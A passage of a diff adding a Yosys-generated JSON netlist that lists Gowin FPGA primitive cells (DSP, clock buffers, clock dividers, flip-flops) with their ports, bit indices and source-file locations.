38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55 ] + }, + "B": { + "direction": "input", + "bits": [ 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109 ] + }, + "ASIGN": { + "direction": "input", + "bits": [ 110 ] + }, + "BSIGN": { + "direction": "input", + "bits": [ 111 ] + }, + "ACCLOAD": { + "direction": "input", + "bits": [ 112 ] + }, + "CASI": { + "direction": "input", + "bits": [ 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167 ] + }, + "CLK": { + "direction": "input", + "bits": [ 168 ] + }, + "CE": { + "direction": "input", + "bits": [ 169 ] + }, + "RESET": { + "direction": "input", + "bits": [ 170 ] + }, + "DOUT": { + "direction": "output", + "bits": [ 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224 ] + }, + "CASO": { + "direction": "output", + "bits": [ 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279 ] + } + }, + "cells": { + }, + "netnames": { + "A": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1334.14-1334.15" + } + }, + "ACCLOAD": { + "hide_name": 0, + "bits": [ 112 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1336.7-1336.14" + } + }, + "ASIGN": { + "hide_name": 0, + "bits": [ 110 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1335.7-1335.12" + } + }, + "B": { + "hide_name": 0, + "bits": [ 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1334.17-1334.18" + } + }, + "BSIGN": { + "hide_name": 0, + "bits": [ 111 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1335.13-1335.18" + } + }, + "CASI": { + "hide_name": 0, + "bits": [ 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1337.14-1337.18" + } + }, + "CASO": { + "hide_name": 0, + "bits": [ 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1340.15-1340.19" + } + }, + "CE": { + "hide_name": 0, + "bits": [ 169 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1338.12-1338.14" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 168 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1338.7-1338.10" + } + }, + "DOUT": { + "hide_name": 0, + "bits": [ 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1339.15-1339.19" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 170 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1338.16-1338.21" + } + } + } + }, + "BANDGAP": { + "attributes": { + "keep": "00000000000000000000000000000001", + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:927.1-928.10" + }, + "ports": { + "BGEN": { + "direction": "input", + "bits": [ 2 ] + } + }, + "cells": { + }, + "netnames": { + "BGEN": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:927.23-927.27" + } + } + } + }, + "BUFG": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1353.1-1356.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "I": { + "direction": "input", + "bits": [ 3 ] + } + }, + "cells": { + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1355.7-1355.8" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1354.8-1354.9" + } + } + } + }, + "BUFS": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1359.1-1362.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "I": { + "direction": "input", + "bits": [ 3 ] + } + }, + "cells": { + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1361.7-1361.8" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1360.8-1360.9" + } + } + } + }, + "CLKDIV": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1474.1-1481.10" + }, + "parameter_default_values": { + "DIV_MODE": "2", + "GSREN": "false" + }, + "ports": { + "HCLKIN": { + "direction": "input", + "bits": [ 2 ] + }, + "RESETN": { + "direction": "input", + "bits": [ 3 ] + }, + "CALIB": { + "direction": "input", + "bits": [ 4 ] + }, + "CLKOUT": { + "direction": "output", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "CALIB": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1477.7-1477.12" + } + }, + "CLKOUT": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1478.8-1478.14" + } + }, + "HCLKIN": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1475.7-1475.13" + } + }, + "RESETN": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1476.7-1476.13" + } + } + } + }, + "CLKDIV2": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1684.1-1688.10" + }, + "parameter_default_values": { + "GSREN": "false" + }, + "ports": { + "HCLKIN": { + "direction": "input", + "bits": [ 2 ] + }, + "RESETN": { + "direction": "input", + "bits": [ 3 ] + }, + "CLKOUT": { + "direction": "output", + "bits": [ 4 ] + } + }, + "cells": { + }, + "netnames": { + "CLKOUT": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1687.8-1687.14" + } + }, + "HCLKIN": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1686.7-1686.13" + } + }, + "RESETN": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1686.15-1686.21" + } + } + } + }, + "CLKDIVG": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1986.1-1993.10" + }, + "parameter_default_values": { + "DIV_MODE": "2", + "GSREN": "false" + }, + "ports": { + "CLKIN": { + "direction": "input", + "bits": [ 2 ] + }, + "RESETN": { + "direction": "input", + "bits": [ 3 ] + }, + "CALIB": { + "direction": "input", + "bits": [ 4 ] + }, + "CLKOUT": { + "direction": "output", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "CALIB": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1989.7-1989.12" + } + }, + "CLKIN": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1987.7-1987.12" + } + }, + "CLKOUT": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1990.8-1990.14" + } + }, + "RESETN": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1988.7-1988.13" + } + } + } + }, + "DCC": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1690.1-1695.10" + }, + "parameter_default_values": { + "DCC_EN": "1" + }, + "ports": { + "CLKOUT": { + "direction": "output", + "bits": [ 2 ] + }, + "CLKIN": { + "direction": "input", + "bits": [ 3 ] + } + }, + "cells": { + }, + "netnames": { + "CLKIN": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1692.7-1692.12" + } + }, + "CLKOUT": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1691.8-1691.14" + } + } + } + }, + "DCCG": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1914.1-1919.10" + }, + "parameter_default_values": { + "DCC_MODE": "00" + }, + "ports": { + "CLKOUT": { + "direction": "output", + "bits": [ 2 ] + }, + "CLKIN": { + "direction": "input", + "bits": [ 3 ] + } + }, + "cells": { + }, + "netnames": { + "CLKIN": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1916.7-1916.12" + } + }, + "CLKOUT": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1915.8-1915.14" + } + } + } + }, + "DCS": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1962.1-1967.10" + }, + "parameter_default_values": { + "DCS_MODE": "RISING" + }, + "ports": { + "CLK0": { + "direction": "input", + "bits": [ 2 ] + }, + "CLK1": { + "direction": "input", + "bits": [ 3 ] + }, + "CLK2": { + "direction": "input", + "bits": [ 4 ] + }, + "CLK3": { + "direction": "input", + "bits": [ 5 ] + }, + "CLKSEL": { + "direction": "input", + "bits": [ 6, 7, 8, 9 ] + }, + "SELFORCE": { + "direction": "input", + "bits": [ 10 ] + }, + "CLKOUT": { + "direction": "output", + "bits": [ 11 ] + } + }, + "cells": { + }, + "netnames": { + "CLK0": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1963.7-1963.11" + } + }, + "CLK1": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1963.13-1963.17" + } + }, + "CLK2": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1963.19-1963.23" + } + }, + "CLK3": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1963.25-1963.29" + } + }, + "CLKOUT": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1965.8-1965.14" + } + }, + "CLKSEL": { + "hide_name": 0, + "bits": [ 6, 7, 8, 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1964.13-1964.19" + } + }, + "SELFORCE": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1963.31-1963.39" + } + } + } + }, + "DFF": { + "attributes": { + "abc9_flop": "00000000000000000000000000000001", + "blackbox": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:170.1-181.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "CLK": { + "direction": "input", + "bits": [ 3 ] + }, + "D": { + "direction": "input", + "bits": [ 4 ] + } + }, + "cells": { + }, + "netnames": { + "CLK": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:170.33-170.36" + } + }, + "D": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:170.38-170.39" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:170.24-170.25" + } + } + } + }, + "DFFC": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:318.1-334.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "CLK": { + "direction": "input", + "bits": [ 4 ] + }, + "CLEAR": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "CLEAR": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:318.42-318.47" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:318.37-318.40" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:318.34-318.35" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:318.25-318.26" + } + } + } + }, + "DFFCE": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:337.1-354.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "CLK": { + "direction": "input", + "bits": [ 4 ] + }, + "CE": { + "direction": "input", + "bits": [ 5 ] + }, + "CLEAR": { + "direction": "input", + "bits": [ 6 ] + } + }, + "cells": { + }, + "netnames": { + "CE": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:337.43-337.45" + } + }, + "CLEAR": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:337.47-337.52" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:337.38-337.41" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:337.35-337.36" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:337.26-337.27" + } + } + } + }, + "DFFE": { + "attributes": { + "abc9_flop": "00000000000000000000000000000001", + "blackbox": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:184.1-198.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "CLK": { + "direction": "input", + "bits": [ 4 ] + }, + "CE": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "CE": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:184.42-184.44" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:184.37-184.40" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:184.34-184.35" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:184.25-184.26" + } + } + } + }, + "DFFN": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "abc9_flop": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:357.1-368.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "CLK": { + "direction": "input", + "bits": [ 3 ] + }, + "D": { + "direction": "input", + "bits": [ 4 ] + } + }, + "cells": { + }, + "netnames": { + "CLK": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:357.34-357.37" + } + }, + "D": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:357.39-357.40" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:357.25-357.26" + } + } + } + }, + "DFFNC": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:505.1-521.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "CLK": { + "direction": "input", + "bits": [ 4 ] + }, + "CLEAR": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "CLEAR": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:505.43-505.48" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:505.38-505.41" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:505.35-505.36" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:505.26-505.27" + } + } + } + }, + "DFFNCE": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:524.1-541.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "CLK": { + "direction": "input", + "bits": [ 4 ] + }, + "CE": { + "direction": "input", + "bits": [ 5 ] + }, + "CLEAR": { + "direction": "input", + "bits": [ 6 ] + } + }, + "cells": { + }, + "netnames": { + "CE": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:524.44-524.46" + } + }, + "CLEAR": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:524.48-524.53" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:524.39-524.42" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:524.36-524.37" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:524.27-524.28" + } + } + } + }, + "DFFNE": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "abc9_flop": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:371.1-385.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "CLK": { + "direction": "input", + "bits": [ 4 ] + }, + "CE": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "CE": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:371.43-371.45" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:371.38-371.41" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:371.35-371.36" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:371.26-371.27" + } + } + } + }, + "DFFNP": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:466.1-482.10" + }, + "parameter_default_values": { + "INIT": "1" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "CLK": { + "direction": "input", + "bits": [ 4 ] + }, + "PRESET": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "CLK": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:466.38-466.41" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:466.35-466.36" + } + }, + "PRESET": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:466.43-466.49" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:466.26-466.27" + } + } + } + }, + "DFFNPE": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:485.1-502.10" + }, + "parameter_default_values": { + "INIT": "1" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "CLK": { + "direction": "input", + "bits": [ 4 ] + }, + "CE": { + "direction": "input", + "bits": [ 5 ] + }, + "PRESET": { + "direction": "input", + "bits": [ 6 ] + } + }, + "cells": { + }, + "netnames": { + "CE": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:485.44-485.46" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:485.39-485.42" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:485.36-485.37" + } + }, + "PRESET": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:485.48-485.54" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:485.27-485.28" + } + } + } + }, + "DFFNR": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "abc9_flop": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:427.1-443.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "CLK": { + "direction": "input", + "bits": [ 4 ] + }, + "RESET": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "CLK": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:427.38-427.41" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:427.35-427.36" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:427.26-427.27" 